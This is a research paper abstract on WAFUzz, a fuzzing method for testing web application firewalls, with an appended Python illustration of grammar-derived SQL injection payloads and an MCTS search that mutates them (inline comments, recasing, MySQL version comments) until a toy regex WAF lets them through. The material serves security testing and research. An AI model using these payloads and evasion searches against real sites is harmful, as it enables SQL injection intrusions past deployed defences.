WAFUzz: A Fuzz-based WAF protection function testing technology
Proceedings of 2025 2nd International Conference on Machine Learning and Intelligent Computing, PMLR 278:560-572, 2025.
Abstract
Web Application Firewalls (WAFs) are designed to detect and intercept potentially malicious HTTP requests, thereby protecting web applications from various attacks. However, if a WAF's rule set or detection strategy is flawed, its protection may fail under certain conditions, so comprehensive application security cannot be assured. Existing WAF protection testing methods either rely on fixed attack payload datasets, whose limited coverage makes testing inefficient, or use machine learning to pre-train adversarial WAF models, which are unsuitable for testing WAF services deployed in the real world. To address this, we propose a new WAF evaluation technique based on fuzz testing. The method uses context-free grammars to generate diverse attack payloads and combines them with Monte Carlo Tree Search (MCTS) to optimize mutation paths, achieving systematic testing of WAF defenses. Specifically, we predefine context-free grammars for SQL injection (SQLi) and cross-site scripting (XSS) based on expert knowledge; these generate the initial inputs for fuzz testing, which serve as seed payloads for subsequent mutation. MCTS then guides the mutation process by dynamically adjusting node weights to prioritize the exploration of promising paths, improving test efficiency and effectiveness. Experimental results show that our approach achieves protection failure rates of 48.80% for SQLi and 37.80% for XSS, outperforming benchmark tools such as WAF-A-MOLE and SqlMap. In addition, the invalid payload rate drops to 5.63% and 6.72% for SQLi and XSS respectively, and the number of WAF queries is reduced by a factor of more than 22, demonstrating the evaluation efficiency of our approach.
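The pipeline the abstract describes (grammar-derived seed payloads, MCTS over mutation operators, reward taken from the WAF's verdict) in miniature, as an added example that is not the paper's code: the SQLi grammar, the three mutation operators, the regex blocklist standing in for a WAF and every parameter below are constructed for this illustration, and nothing here claims that WAFUzz uses these particular rules or operators. The mutations are restricted to transformations that leave the SQL semantics unchanged (inline comments, keyword recasing, MySQL version comments), which is what keeps an invalid-payload rate low; the WAF stand-in counts queries so the cost of a search can be measured.

```python
# Added illustration (not the WAFUzz authors' code): grammar, mutation operators,
# the regex stand-in for a WAF and all parameters are constructed for this example.
import math
import random
import re

SQLI_GRAMMAR = {  # tiny CFG for boolean-based SQLi seeds; <x> marks a nonterminal
    "<payload>": [["'", " ", "OR", " ", "<cond>", "<tail>"]],
    "<cond>": [["1=1"], ["2=2"], ["'a'='a'"]],
    "<tail>": [["#"], ["-- -"]],
}

def derive(grammar, symbol, rng):
    """Expand a symbol left to right, picking one alternative per nonterminal."""
    if symbol not in grammar:
        return symbol  # terminal
    return "".join(derive(grammar, s, rng) for s in rng.choice(grammar[symbol]))

# Mutations chosen to keep the payload valid MySQL, so the invalid-payload rate stays low.
def flip_case(p, rng):
    """Recase the OR keyword; a dud against a case-insensitive rule."""
    m = re.search(r"\bor\b", p, re.IGNORECASE)
    if not m:
        return p
    word = "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in m.group())
    return p[:m.start()] + word + p[m.end():]

def space_to_comment(p, rng):
    """Replace one space with /**/, sparing the space that terminates a '--' marker."""
    idx = [i for i, c in enumerate(p) if c == " " and p[i - 2:i] != "--"]
    if not idx:
        return p
    i = rng.choice(idx)
    return p[:i] + "/**/" + p[i + 1:]

def version_comment_or(p, rng):
    """Wrap OR in a MySQL version comment /*!OR*/, which the server still executes."""
    if "/*!" in p:
        return p
    return re.sub(r"\bor\b", "/*!OR*/", p, count=1, flags=re.IGNORECASE)

MUTATIONS = [flip_case, space_to_comment, version_comment_or]

class ToyWAF:
    """Stand-in WAF: a case-insensitive regex blocklist that counts every query."""
    RULES = [re.compile(r, re.IGNORECASE) for r in
             (r"\bor\s+\d+\s*=\s*\d+", r"\bor\s+'[^']*'\s*=\s*'[^']*'")]

    def __init__(self):
        self.queries = 0

    def blocks(self, payload):
        self.queries += 1
        return any(rule.search(payload) for rule in self.RULES)

class Node:
    """MCTS node: a payload reached by a path of mutations from the seed."""
    def __init__(self, payload, parent=None):
        self.payload, self.parent = payload, parent
        self.children, self.visits, self.reward = [], 0, 0.0
        self.untried = list(MUTATIONS)

def select(node, c=1.4):
    """Descend by UCB1 until reaching a node that still has an untried mutation."""
    while not node.untried and node.children:
        n = node.visits
        node = max(node.children, key=lambda ch: ch.reward / ch.visits
                   + c * math.sqrt(math.log(n) / ch.visits))
    return node

def rollout(payload, rng, waf, depth=2):
    """Random playout of up to `depth` extra mutations; reward 1.0 on a bypass."""
    for _ in range(depth):
        if not waf.blocks(payload):
            return 1.0, payload
        payload = rng.choice(MUTATIONS)(payload, rng)
    return (0.0 if waf.blocks(payload) else 1.0), payload

def mcts_bypass(seed_payload, waf, rng, iterations=200):
    """Return the first payload the WAF lets through, or None after `iterations`."""
    root = Node(seed_payload)
    for _ in range(iterations):
        node = select(root)
        if node.untried:  # expansion: apply the next untried operator
            child = Node(node.untried.pop(0)(node.payload, rng), parent=node)
            node.children.append(child)
            node = child
        reward, candidate = rollout(node.payload, rng, waf)
        while node is not None:  # backpropagation along the mutation path
            node.visits += 1
            node.reward += reward
            node = node.parent
        if reward == 1.0:
            return candidate
    return None

def demo(seed=7, iterations=200):
    """Derive one seed from the grammar, then search for a variant the WAF misses."""
    rng, waf = random.Random(seed), ToyWAF()
    initial = derive(SQLI_GRAMMAR, "<payload>", rng)
    bypass = mcts_bypass(initial, waf, rng, iterations)
    return {"seed": initial, "bypass": bypass, "queries": waf.queries}
```

Running `demo()` derives a seed such as `' OR 1=1#`, which the blocklist catches, and the search then finds a variant such as `' OR/**/1=1#` or `' /*!OR*/ 1=1#` that the `\s+` in the rule no longer matches. Against a real WAF the `ToyWAF.blocks` call would be an HTTP request whose verdict comes from the response, and the query counter corresponds to the query count the abstract uses as an efficiency metric.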